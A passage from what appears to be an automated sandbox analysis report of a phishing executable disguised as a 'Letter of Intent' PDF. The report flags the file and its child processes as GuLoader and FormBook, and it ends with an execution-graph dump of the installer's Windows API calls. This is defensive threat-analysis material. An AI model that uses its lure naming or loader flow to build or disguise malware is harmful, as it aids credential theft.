                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1950807727.0000000004D63000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:14:32:27
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:872'244 bytes
                                                                                    MD5 hash:629BE165860D2336755DE85467756639
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:14:32:59
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe"
                                                                                    Imagebase:0x6e0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:14:33:02
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Windows\SysWOW64\xwizard.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                                                    Imagebase:0x370000
                                                                                    File size:55'808 bytes
                                                                                    MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:14:33:14
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe"
                                                                                    Imagebase:0x6e0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:14:33:26
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff6bf500000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:23.1%
                                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                                      Signature Coverage:18.2%
                                                                                      Total number of Nodes:1503
                                                                                      Total number of Limit Nodes:46
                                                                                      execution_graph 4636 10001000 4639 1000101b 4636->4639 4646 1000152e 4639->4646 4641 10001020 4642 10001027 GlobalAlloc 4641->4642 4643 10001024 4641->4643 4642->4643 4644 10001555 3 API calls 4643->4644 4645 10001019 4644->4645 4647 10001243 3 API calls 4646->4647 4649 10001534 4647->4649 4648 1000153a 4648->4641 4649->4648 4650 10001546 GlobalFree 4649->4650 4650->4641 4651 401d41 GetDC GetDeviceCaps 4652 402ab3 18 API calls 4651->4652 4653 401d5f MulDiv ReleaseDC 4652->4653 4654 402ab3 18 API calls 4653->4654 4655 401d7e 4654->4655 4656 405d68 18 API calls 4655->4656 4657 401db7 CreateFontIndirectW 4656->4657 4658 4024e6 4657->4658 4659 401a42 4660 402ab3 18 API calls 4659->4660 4661 401a48 4660->4661 4662 402ab3 18 API calls 4661->4662 4663 4019f0 4662->4663 4664 401cc6 4665 402ab3 18 API calls 4664->4665 4666 401cd9 SetWindowLongW 4665->4666 4667 40295d 4666->4667 3808 401dc7 3816 402ab3 3808->3816 3810 401dcd 3811 402ab3 18 API calls 3810->3811 3812 401dd6 3811->3812 3813 401de8 EnableWindow 3812->3813 3814 401ddd ShowWindow 3812->3814 3815 40295d 3813->3815 3814->3815 3817 405d68 18 API calls 3816->3817 3818 402ac7 3817->3818 3818->3810 4668 4024ca 4669 402ad0 18 API calls 4668->4669 4670 4024d1 4669->4670 4673 4059cf GetFileAttributesW CreateFileW 4670->4673 4672 4024dd 4673->4672 4674 401bca 4675 402ab3 18 API calls 4674->4675 4676 401bd1 4675->4676 4677 402ab3 18 API calls 4676->4677 4678 401bdb 4677->4678 4679 401beb 4678->4679 4680 402ad0 18 API calls 4678->4680 4681 402ad0 18 API calls 4679->4681 4685 401bfb 4679->4685 4680->4679 4681->4685 4682 401c06 4686 402ab3 18 API calls 4682->4686 4683 401c4a 4684 402ad0 18 API calls 4683->4684 4687 401c4f 4684->4687 4685->4682 4685->4683 4688 401c0b 4686->4688 4689 402ad0 18 API calls 4687->4689 4690 402ab3 18 API calls 4688->4690 4691 401c58 FindWindowExW 4689->4691 4692 401c14 4690->4692 4695 401c7a 4691->4695 4693 401c3a SendMessageW 4692->4693 4694 401c1c SendMessageTimeoutW 4692->4694 4693->4695 4694->4695 4696 40194b 4697 402ab3 18 API calls 4696->4697 4698 401952 4697->4698 4699 402ab3 18 API calls 4698->4699 4700 40195c 4699->4700 4701 402ad0 18 API calls 4700->4701 4702 401965 4701->4702 4703 401979 lstrlenW 4702->4703 4705 4019b5 4702->4705 4704 401983 4703->4704 4704->4705 4709 405d46 lstrcpynW 4704->4709 4707 40199e 4707->4705 4708 4019ab lstrlenW 4707->4708 4708->4705 4709->4707 4710 40274b 4711 402ad0 18 API calls 4710->4711 4712 402759 4711->4712 4713 40276f 4712->4713 4714 402ad0 18 API calls 4712->4714 4715 4059aa 2 API calls 4713->4715 4714->4713 4716 402775 4715->4716 4736 4059cf GetFileAttributesW CreateFileW 4716->4736 4718 402782 4719 40282b 4718->4719 4720 40278e GlobalAlloc 4718->4720 4723 402833 DeleteFileW 4719->4723 4724 402846 4719->4724 4721 402822 CloseHandle 4720->4721 4722 4027a7 4720->4722 4721->4719 4737 403192 SetFilePointer 4722->4737 4723->4724 4726 4027ad 4727 403160 ReadFile 4726->4727 4728 4027b6 GlobalAlloc 4727->4728 4729 4027c6 4728->4729 4730 4027fa WriteFile GlobalFree 4728->4730 4731 402f38 33 API calls 4729->4731 4732 402f38 33 API calls 4730->4732 4734 4027d3 4731->4734 4733 40281f 4732->4733 4733->4721 4735 4027f1 GlobalFree 4734->4735 4735->4730 4736->4718 4737->4726 4741 40284c 4742 402ab3 18 API calls 4741->4742 4743 402852 4742->4743 4744 402875 4743->4744 4745 40288e 4743->4745 4753 402729 4743->4753 4748 40287a 4744->4748 4749 40288b 4744->4749 4746 4028a4 4745->4746 4747 402898 4745->4747 4751 405d68 18 API calls 4746->4751 4750 402ab3 18 API calls 4747->4750 4755 405d46 lstrcpynW 4748->4755 4756 405c8d wsprintfW 4749->4756 4750->4753 4751->4753 4755->4753 4756->4753 4757 40164d 4758 402ad0 18 API calls 4757->4758 4759 401653 4758->4759 4760 406089 2 API calls 4759->4760 4761 401659 4760->4761 4762 4019cf 4763 402ad0 18 API calls 4762->4763 4764 4019d6 4763->4764 4765 402ad0 18 API calls 4764->4765 4766 4019df 4765->4766 4767 4019e6 lstrcmpiW 4766->4767 4768 4019f8 lstrcmpW 4766->4768 4769 4019ec 4767->4769 4768->4769 3888 401e51 3889 402ad0 18 API calls 3888->3889 3890 401e57 3889->3890 3891 404ffa 25 API calls 3890->3891 3892 401e61 3891->3892 3906 4054c8 CreateProcessW 3892->3906 3895 401ec6 CloseHandle 3898 402729 3895->3898 3896 401e77 WaitForSingleObject 3897 401e89 3896->3897 3899 401e9b GetExitCodeProcess 3897->3899 3909 4060e9 3897->3909 3901 401eba 3899->3901 3902 401ead 3899->3902 3901->3895 3903 401eb8 3901->3903 3913 405c8d wsprintfW 3902->3913 3903->3895 3907 401e67 3906->3907 3908 4054f7 CloseHandle 3906->3908 3907->3895 3907->3896 3907->3898 3908->3907 3910 406106 PeekMessageW 3909->3910 3911 401e90 WaitForSingleObject 3910->3911 3912 4060fc DispatchMessageW 3910->3912 3911->3897 3912->3910 3913->3903 3914 402251 3915 40225f 3914->3915 3916 402259 3914->3916 3918 40226d 3915->3918 3919 402ad0 18 API calls 3915->3919 3917 402ad0 18 API calls 3916->3917 3917->3915 3920 40227b 3918->3920 3921 402ad0 18 API calls 3918->3921 3919->3918 3922 402ad0 18 API calls 3920->3922 3921->3920 3923 402284 WritePrivateProfileStringW 3922->3923 4770 4028d1 4771 402ab3 18 API calls 4770->4771 4772 4028d7 4771->4772 4773 40290a 4772->4773 4774 402729 4772->4774 4776 4028e5 4772->4776 4773->4774 4775 405d68 18 API calls 4773->4775 4775->4774 4776->4774 4778 405c8d wsprintfW 4776->4778 4778->4774 3937 402452 3947 402bda 3937->3947 3939 40245c 3940 402ab3 18 API calls 3939->3940 3941 402465 3940->3941 3942 402489 RegEnumValueW 3941->3942 3943 40247d RegEnumKeyW 3941->3943 3944 402729 3941->3944 3942->3944 3945 4024a2 RegCloseKey 3942->3945 3943->3945 3945->3944 3948 402ad0 18 API calls 3947->3948 3949 402bf3 3948->3949 3950 402c01 RegOpenKeyExW 3949->3950 3950->3939 3951 401752 3952 402ad0 18 API calls 3951->3952 3953 401759 3952->3953 3954 401781 3953->3954 3955 401779 3953->3955 3992 405d46 lstrcpynW 3954->3992 3991 405d46 lstrcpynW 3955->3991 3958 40177f 3962 405fda 5 API calls 3958->3962 3959 40178c 3960 4057ae 3 API calls 3959->3960 3961 401792 lstrcatW 3960->3961 3961->3958 3965 40179e 3962->3965 3963 406089 2 API calls 3963->3965 3964 4017da 3966 4059aa 2 API calls 3964->3966 3965->3963 3965->3964 3968 4017b0 CompareFileTime 3965->3968 3969 401870 3965->3969 3970 401847 3965->3970 3973 405d46 lstrcpynW 3965->3973 3978 405d68 18 API calls 3965->3978 3987 405529 MessageBoxIndirectW 3965->3987 3990 4059cf GetFileAttributesW CreateFileW 3965->3990 3966->3965 3968->3965 3971 404ffa 25 API calls 3969->3971 3972 404ffa 25 API calls 3970->3972 3980 40185c 3970->3980 3974 40187a 3971->3974 3972->3980 3973->3965 3975 402f38 33 API calls 3974->3975 3976 40188d 3975->3976 3977 4018a1 SetFileTime 3976->3977 3979 4018b3 CloseHandle 3976->3979 3977->3979 3978->3965 3979->3980 3981 4018c4 3979->3981 3982 4018c9 3981->3982 3983 4018dc 3981->3983 3985 405d68 18 API calls 3982->3985 3984 405d68 18 API calls 3983->3984 3986 4018e4 3984->3986 3988 4018d1 lstrcatW 3985->3988 3989 405529 MessageBoxIndirectW 3986->3989 3987->3965 3988->3986 3989->3980 3990->3965 3991->3958 3992->3959 3993 4022d3 3994 402303 3993->3994 3995 4022d8 3993->3995 3997 402ad0 18 API calls 3994->3997 3996 402bda 19 API calls 3995->3996 3998 4022df 3996->3998 3999 40230a 3997->3999 4000 4022e9 3998->4000 4002 402320 3998->4002 4005 402b10 RegOpenKeyExW 3999->4005 4001 402ad0 18 API calls 4000->4001 4003 4022f0 RegDeleteValueW RegCloseKey 4001->4003 4003->4002 4006 402ba4 4005->4006 4013 402b3b 4005->4013 4006->4002 4007 402b61 RegEnumKeyW 4008 402b73 RegCloseKey 4007->4008 4007->4013 4010 4060b0 3 API calls 4008->4010 4009 402b98 RegCloseKey 4014 402b87 4009->4014 4012 402b83 4010->4012 4011 402b10 3 API calls 4011->4013 4012->4014 4015 402bb3 RegDeleteKeyW 4012->4015 4013->4007 4013->4008 4013->4009 4013->4011 4014->4006 4015->4014 4779 401ed4 4780 402ad0 18 API calls 4779->4780 4781 401edb 4780->4781 4782 406089 2 API calls 4781->4782 4783 401ee1 4782->4783 4785 401ef2 4783->4785 4786 405c8d wsprintfW 4783->4786 4786->4785 4023 4014d7 4024 402ab3 18 API calls 4023->4024 4025 4014dd Sleep 4024->4025 4027 40295d 4025->4027 4787 4036d8 4788 4036e3 4787->4788 4789 4036e7 4788->4789 4790 4036ea GlobalAlloc 4788->4790 4790->4789 4791 40155b 4792 402903 4791->4792 4795 405c8d wsprintfW 4792->4795 4794 402908 4795->4794 4796 4026dc 4797 4026db 4796->4797 4797->4796 4798 4026ec FindNextFileW 4797->4798 4800 4026f7 4797->4800 4799 40273e 4798->4799 4798->4800 4802 405d46 lstrcpynW 4799->4802 4802->4800 4326 4031dd #17 SetErrorMode OleInitialize 4327 4060b0 3 API calls 4326->4327 4328 403220 SHGetFileInfoW 4327->4328 4399 405d46 lstrcpynW 4328->4399 4330 40324b GetCommandLineW 4400 405d46 lstrcpynW 4330->4400 4332 40325d GetModuleHandleW 4333 403275 4332->4333 4334 4057db CharNextW 4333->4334 4335 403284 CharNextW 4334->4335 4346 403294 4335->4346 4336 403364 4337 403378 GetTempPathW 4336->4337 4401 4031a9 4337->4401 4339 403390 4341 403394 GetWindowsDirectoryW lstrcatW 4339->4341 4342 4033ea DeleteFileW 4339->4342 4340 4057db CharNextW 4340->4346 4344 4031a9 11 API calls 4341->4344 4409 402cff GetTickCount GetModuleFileNameW 4342->4409 4347 4033b0 4344->4347 4345 4033fe 4354 4057db CharNextW 4345->4354 4383 403486 4345->4383 4394 403496 4345->4394 4346->4336 4346->4340 4348 403366 4346->4348 4347->4342 4349 4033b4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4347->4349 4491 405d46 lstrcpynW 4348->4491 4352 4031a9 11 API calls 4349->4352 4353 4033e2 4352->4353 4353->4342 4353->4394 4357 403419 4354->4357 4364 403460 4357->4364 4365 4034c5 lstrcatW lstrcmpiW 4357->4365 4358 4035a5 4360 403628 ExitProcess 4358->4360 4362 4060b0 3 API calls 4358->4362 4359 4034af 4361 405529 MessageBoxIndirectW 4359->4361 4366 4034bd ExitProcess 4361->4366 4367 4035b4 4362->4367 4368 4058b6 18 API calls 4364->4368 4369 4034e1 CreateDirectoryW SetCurrentDirectoryW 4365->4369 4365->4394 4372 4060b0 3 API calls 4367->4372 4373 40346c 4368->4373 4370 403504 4369->4370 4371 4034f9 4369->4371 4502 405d46 lstrcpynW 4370->4502 4501 405d46 lstrcpynW 4371->4501 4376 4035bd 4372->4376 4373->4394 4492 405d46 lstrcpynW 4373->4492 4378 4060b0 3 API calls 4376->4378 4386 4035c6 4378->4386 4379 40347b 4493 405d46 lstrcpynW 4379->4493 4381 405d68 18 API calls 4384 403543 DeleteFileW 4381->4384 4382 403614 ExitWindowsEx 4382->4360 4385 403621 4382->4385 4437 40371a 4383->4437 4387 403550 CopyFileW 4384->4387 4395 403512 4384->4395 4503 40140b 4385->4503 4386->4382 4389 4035d4 GetCurrentProcess 4386->4389 4387->4395 4391 4035e4 4389->4391 4390 403599 4392 405be0 40 API calls 4390->4392 4391->4382 4392->4394 4393 405be0 40 API calls 4393->4395 4494 403640 4394->4494 4395->4381 4395->4390 4395->4393 4396 405d68 18 API calls 4395->4396 4397 4054c8 2 API calls 4395->4397 4398 403584 CloseHandle 4395->4398 4396->4395 4397->4395 4398->4395 4399->4330 4400->4332 4402 405fda 5 API calls 4401->4402 4403 4031b5 4402->4403 4404 4031bf 4403->4404 4405 4057ae 3 API calls 4403->4405 4404->4339 4406 4031c7 CreateDirectoryW 4405->4406 4506 4059fe 4406->4506 4510 4059cf GetFileAttributesW CreateFileW 4409->4510 4411 402d3f 4430 402d4f 4411->4430 4511 405d46 lstrcpynW 4411->4511 4413 402d65 4414 4057fa 2 API calls 4413->4414 4415 402d6b 4414->4415 4512 405d46 lstrcpynW 4415->4512 4417 402d76 GetFileSize 4418 402e72 4417->4418 4436 402d8d 4417->4436 4513 402c9b 4418->4513 4420 402e7b 4422 402eab GlobalAlloc 4420->4422 4420->4430 4524 403192 SetFilePointer 4420->4524 4421 403160 ReadFile 4421->4436 4525 403192 SetFilePointer 4422->4525 4425 402ede 4427 402c9b 6 API calls 4425->4427 4426 402ec6 4429 402f38 33 API calls 4426->4429 4427->4430 4428 402e94 4431 403160 ReadFile 4428->4431 4434 402ed2 4429->4434 4430->4345 4433 402e9f 4431->4433 4432 402c9b 6 API calls 4432->4436 4433->4422 4433->4430 4434->4430 4434->4434 4435 402f0f SetFilePointer 4434->4435 4435->4430 4436->4418 4436->4421 4436->4425 4436->4430 4436->4432 4438 4060b0 3 API calls 4437->4438 4439 40372e 4438->4439 4440 403734 4439->4440 4441 403746 4439->4441 4535 405c8d wsprintfW 4440->4535 4442 405c13 3 API calls 4441->4442 4443 403776 4442->4443 4445 403795 lstrcatW 4443->4445 4446 405c13 3 API calls 4443->4446 4447 403744 4445->4447 4446->4445 4526 4039f0 4447->4526 4450 4058b6 18 API calls 4451 4037c7 4450->4451 4452 40385b 4451->4452 4454 405c13 3 API calls 4451->4454 4453 4058b6 18 API calls 4452->4453 4455 403861 4453->4455 4456 4037f9 4454->4456 4457 403871 LoadImageW 4455->4457 4458 405d68 18 API calls 4455->4458 4456->4452 4463 40381a lstrlenW 4456->4463 4467 4057db CharNextW 4456->4467 4459 403917 4457->4459 4460 403898 RegisterClassW 4457->4460 4458->4457 4462 40140b 2 API calls 4459->4462 4461 4038ce SystemParametersInfoW CreateWindowExW 4460->4461 4489 403921 4460->4489 4461->4459 4466 40391d 4462->4466 4464 403828 lstrcmpiW 4463->4464 4465 40384e 4463->4465 4464->4465 4468 403838 GetFileAttributesW 4464->4468 4469 4057ae 3 API calls 4465->4469 4472 4039f0 19 API calls 4466->4472 4466->4489 4470 403817 4467->4470 4471 403844 4468->4471 4473 403854 4469->4473 4470->4463 4471->4465 4474 4057fa 2 API calls 4471->4474 4475 40392e 4472->4475 4536 405d46 lstrcpynW 4473->4536 4474->4465 4477 40393a ShowWindow LoadLibraryW 4475->4477 4478 4039bd 4475->4478 4480 403960 GetClassInfoW 4477->4480 4481 403959 LoadLibraryW 4477->4481 4479 4050cd 5 API calls 4478->4479 4482 4039c3 4479->4482 4483 403974 GetClassInfoW RegisterClassW 4480->4483 4484 40398a DialogBoxParamW 4480->4484 4481->4480 4485 4039c7 4482->4485 4486 4039df 4482->4486 4483->4484 4487 40140b 2 API calls 4484->4487 4485->4489 4490 40140b 2 API calls 4485->4490 4488 40140b 2 API calls 4486->4488 4487->4489 4488->4489 4489->4394 4490->4489 4491->4337 4492->4379 4493->4383 4495 403658 4494->4495 4496 40364a CloseHandle 4494->4496 4538 403685 4495->4538 4496->4495 4499 4055d5 71 API calls 4500 40349f OleUninitialize 4499->4500 4500->4358 4500->4359 4501->4370 4502->4395 4504 401389 2 API calls 4503->4504 4505 401420 4504->4505 4505->4360 4507 405a0b GetTickCount GetTempFileNameW 4506->4507 4508 405a41 4507->4508 4509 4031db 4507->4509 4508->4507 4508->4509 4509->4339 4510->4411 4511->4413 4512->4417 4514 402ca4 4513->4514 4515 402cbc 4513->4515 4516 402cb4 4514->4516 4517 402cad DestroyWindow 4514->4517 4518 402cc4 4515->4518 4519 402ccc GetTickCount 4515->4519 4516->4420 4517->4516 4520 4060e9 2 API calls 4518->4520 4521 402cda CreateDialogParamW ShowWindow 4519->4521 4522 402cfd 4519->4522 4523 402cca 4520->4523 4521->4522 4522->4420 4523->4420 4524->4428 4525->4426 4527 403a04 4526->4527 4537 405c8d wsprintfW 4527->4537 4529 403a75 4530 405d68 18 API calls 4529->4530 4531 403a81 SetWindowTextW 4530->4531 4532 4037a5 4531->4532 4533 403a9d 4531->4533 4532->4450 4533->4532 4534 405d68 18 API calls 4533->4534 4534->4533 4535->4447 4536->4452 4537->4529 4539 403693 4538->4539 4540 40365d 4539->4540 4541 403698 FreeLibrary GlobalFree 4539->4541 4540->4499 4541->4540 4541->4541 4803 40165e 4804 402ad0 18 API calls 4803->4804 4805 401665 4804->4805 4806 402ad0 18 API calls 4805->4806 4807 40166e 4806->4807 4808 402ad0 18 API calls 4807->4808 4809 401677 MoveFileW 4808->4809 4810 401683 4809->4810 4811 40168a 4809->4811 4813 401423 25 API calls 4810->4813 4812 406089 2 API calls 4811->4812 4815 402195 4811->4815 4814 401699 4812->4814 4813->4815 4814->4815 4816 405be0 40 API calls 4814->4816 4816->4810 4817 4023de 4818 402bda 19 API calls 4817->4818 4819 4023e8 4818->4819 4820 402ad0 18 API calls 4819->4820 4821 4023f1 4820->4821 4822 4023fc RegQueryValueExW 4821->4822 4826 402729 4821->4826 4823 402422 RegCloseKey 4822->4823 4824 40241c 4822->4824 4823->4826 4824->4823 4828 405c8d wsprintfW 4824->4828 4828->4823 4829 4040e3 lstrlenW 4830 404102 4829->4830 4831 404104 WideCharToMultiByte 4829->4831 4830->4831 4832 401ce5 GetDlgItem GetClientRect 4833 402ad0 18 API calls 4832->4833 4834 401d17 LoadImageW SendMessageW 4833->4834 4835 401d35 DeleteObject 4834->4835 4836 40295d 4834->4836 4835->4836 4837 4043e9 4838 4043f9 4837->4838 4839 40441f 4837->4839 4840 403f95 19 API calls 4838->4840 4841 403ffc 8 API calls 4839->4841 4842 404406 SetDlgItemTextW 4840->4842 4843 40442b 4841->4843 4842->4839 3819 40206a 3820 402ad0 18 API calls 3819->3820 3821 402071 3820->3821 3822 402ad0 18 API calls 3821->3822 3823 40207b 3822->3823 3824 402ad0 18 API calls 3823->3824 3825 402084 3824->3825 3826 402ad0 18 API calls 3825->3826 3827 40208e 3826->3827 3828 402ad0 18 API calls 3827->3828 3829 402098 3828->3829 3830 4020ac CoCreateInstance 3829->3830 3832 402ad0 18 API calls 3829->3832 3831 4020cb 3830->3831 3834 402195 3831->3834 3835 401423 3831->3835 3832->3830 3836 404ffa 25 API calls 3835->3836 3837 401431 3836->3837 3837->3834 4844 40156b 4845 401584 4844->4845 4846 40157b ShowWindow 4844->4846 4847 401592 ShowWindow 4845->4847 4848 40295d 4845->4848 4846->4845 4847->4848 4849 4024ec 4850 4024f1 4849->4850 4851 40250a 4849->4851 4852 402ab3 18 API calls 4850->4852 4853 402510 4851->4853 4854 40253c 4851->4854 4859 4024f8 4852->4859 4855 402ad0 18 API calls 4853->4855 4856 402ad0 18 API calls 4854->4856 4857 402517 WideCharToMultiByte lstrlenA 4855->4857 4858 402543 lstrlenW 4856->4858 4857->4859 4858->4859 4860 402565 WriteFile 4859->4860 4861 402729 4859->4861 4860->4861 4862 404f6e 4863 404f92 4862->4863 4864 404f7e 4862->4864 4866 404f9a IsWindowVisible 4863->4866 4869 404fb1 4863->4869 4865 404f84 4864->4865 4874 404fdb 4864->4874 4867 403fe1 SendMessageW 4865->4867 4868 404fa7 4866->4868 4866->4874 4871 404f8e 4867->4871 4875 4048c4 SendMessageW 4868->4875 4870 404fe0 CallWindowProcW 4869->4870 4880 404944 4869->4880 4870->4871 4874->4870 4876 404923 SendMessageW 4875->4876 4877 4048e7 GetMessagePos ScreenToClient SendMessageW 4875->4877 4879 40491b 4876->4879 4878 404920 4877->4878 4877->4879 4878->4876 4879->4869 4889 405d46 lstrcpynW 4880->4889 4882 404957 4890 405c8d wsprintfW 4882->4890 4884 404961 4885 40140b 2 API calls 4884->4885 4886 40496a 4885->4886 4891 405d46 lstrcpynW 4886->4891 4888 404971 4888->4874 4889->4882 4890->4884 4891->4888 4892 4018ef 4893 401926 4892->4893 4894 402ad0 18 API calls 4893->4894 4895 40192b 4894->4895 4896 4055d5 71 API calls 4895->4896 4897 401934 4896->4897 3924 402571 3925 402ab3 18 API calls 3924->3925 3931 40257a 3925->3931 3926 402642 3927 4025c1 ReadFile 3927->3926 3927->3931 3928 4025fe ReadFile 3928->3926 3929 40260d 3928->3929 3929->3926 3929->3931 3930 4025de MultiByteToWideChar 3930->3931 3931->3926 3931->3927 3931->3928 3931->3930 3932 402644 3931->3932 3934 402655 3931->3934 3936 405c8d wsprintfW 3932->3936 3934->3926 3935 402671 SetFilePointer 3934->3935 3935->3926 3936->3926 4898 4014f1 SetForegroundWindow 4899 40295d 4898->4899 4900 4018f2 4901 402ad0 18 API calls 4900->4901 4902 4018f9 4901->4902 4903 405529 MessageBoxIndirectW 4902->4903 4904 401902 4903->4904 4905 401df3 4906 402ad0 18 API calls 4905->4906 4907 401df9 4906->4907 4908 402ad0 18 API calls 4907->4908 4909 401e02 4908->4909 4910 402ad0 18 API calls 4909->4910 4911 401e0b 4910->4911 4912 402ad0 18 API calls 4911->4912 4913 401e14 4912->4913 4914 401423 25 API calls 4913->4914 4915 401e1b ShellExecuteW 4914->4915 4916 401e4c 4915->4916 4922 404976 GetDlgItem GetDlgItem 4923 4049c8 7 API calls 4922->4923 4930 404be1 4922->4930 4924 404a6b DeleteObject 4923->4924 4925 404a5e SendMessageW 4923->4925 4926 404a74 4924->4926 4925->4924 4928 404aab 4926->4928 4929 405d68 18 API calls 4926->4929 4927 404cc5 4932 404d71 4927->4932 4942 404d1e SendMessageW 4927->4942 4964 404bd4 4927->4964 4931 403f95 19 API calls 4928->4931 4933 404a8d SendMessageW SendMessageW 4929->4933 4930->4927 4940 4048c4 5 API calls 4930->4940 4965 404c52 4930->4965 4936 404abf 4931->4936 4934 404d83 4932->4934 4935 404d7b SendMessageW 4932->4935 4933->4926 4939 404dac 4934->4939 4944 404d95 ImageList_Destroy 4934->4944 4945 404d9c 4934->4945 4935->4934 4941 403f95 19 API calls 4936->4941 4937 403ffc 8 API calls 4943 404f67 4937->4943 4938 404cb7 SendMessageW 4938->4927 4947 404f1b 4939->4947 4963 404944 4 API calls 4939->4963 4969 404de7 4939->4969 4940->4965 4946 404acd 4941->4946 4948 404d33 SendMessageW 4942->4948 4942->4964 4944->4945 4945->4939 4949 404da5 GlobalFree 4945->4949 4950 404ba2 GetWindowLongW SetWindowLongW 4946->4950 4957 404b9c 4946->4957 4960 404b1d SendMessageW 4946->4960 4961 404b59 SendMessageW 4946->4961 4962 404b6a SendMessageW 4946->4962 4952 404f2d ShowWindow GetDlgItem ShowWindow 4947->4952 4947->4964 4951 404d46 4948->4951 4949->4939 4953 404bbb 4950->4953 4956 404d57 SendMessageW 4951->4956 4952->4964 4954 404bc1 ShowWindow 4953->4954 4955 404bd9 4953->4955 4973 403fca SendMessageW 4954->4973 4974 403fca SendMessageW 4955->4974 4956->4932 4957->4950 4957->4953 4960->4946 4961->4946 4962->4946 4963->4969 4964->4937 4965->4927 4965->4938 4966 404ef1 InvalidateRect 4966->4947 4967 404f07 4966->4967 4975 4047de 4967->4975 4968 404e15 SendMessageW 4972 404e2b 4968->4972 4969->4968 4969->4972 4971 404e9f SendMessageW SendMessageW 4971->4972 4972->4966 4972->4971 4973->4964 4974->4930 4976 4047fb 4975->4976 4977 405d68 18 API calls 4976->4977 4978 404830 4977->4978 4979 405d68 18 API calls 4978->4979 4980 40483b 4979->4980 4981 405d68 18 API calls 4980->4981 4982 40486c lstrlenW wsprintfW SetDlgItemTextW 4981->4982 4982->4947 4983 404778 4984 4047a4 4983->4984 4985 404788 4983->4985 4987 4047d7 4984->4987 4988 4047aa SHGetPathFromIDListW 4984->4988 4994 40550d GetDlgItemTextW 4985->4994 4990 4047c1 SendMessageW 4988->4990 4991 4047ba 4988->4991 4989 404795 SendMessageW 4989->4984 4990->4987 4993 40140b 2 API calls 4991->4993 